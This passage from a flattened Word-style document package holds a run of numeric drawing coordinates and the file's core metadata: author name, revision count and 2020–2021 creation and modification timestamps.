0,1-1,-1 1,0-1,0 1,-1 0,1-1,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,0-1,0 1,0 0,0-1,0 1,1-1,-1 1,0-1,0 1,0-1,1 1,-1-1,0 0,1 1,-1-1,0 0,1 0,-1 0,0-1,-1-3,-1 0,1-1,0 1,0-1,1 1,-1-1,1-5,-1 2,1 1,-5-11,1 7,2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03EB-02D1-43CD-A928-A65112FE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0</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jiu Li</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yingjiu Li</cp:lastModifiedBy>
  <cp:revision>171</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-06T17:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-03T20:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>